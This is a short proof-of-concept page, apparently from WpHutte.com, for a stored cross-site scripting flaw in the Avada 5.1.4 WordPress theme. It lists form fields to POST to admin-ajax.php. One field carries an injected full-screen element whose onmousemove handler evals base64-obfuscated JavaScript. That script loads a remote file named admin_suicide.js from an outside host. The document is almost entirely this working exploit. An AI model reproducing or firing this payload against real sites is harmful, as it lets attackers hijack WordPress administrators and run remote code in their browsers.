Avada 5.1.4 Stored XSS

by WpHutte.com

Notes:

You will need to move the mouse a bit in the red area when the XSS triger page is loaded

Tested on WordPress 4.7.3

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed

Controls




The Form

Form Field Name POC Data Input field
action fake
permalink_structure 1
avada_portfolio_category_slug
testing" style="position:fixed; top:0px; left:0px; width:9000px; height:9000px; background-color:red;" onmousemove="eval(atob('dmFyIGpzPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO2pzLnR5cGUgPSAnd GV4dC9qYXZhc2NyaXB0Jztqcy5zcmM9J2h0dHBzOi8vY2RuLndwaHV0dGUuY29tL0F2YWRhLzUuMS40L2FkbWluX3N1aWNpZGUuanMnO2RvY3VtZW50Lm JvZHkuYXBwZW5kQ2hpbGQoanMpOwo'))" data-x="

Iframe for POST result


POC by WPHutte.com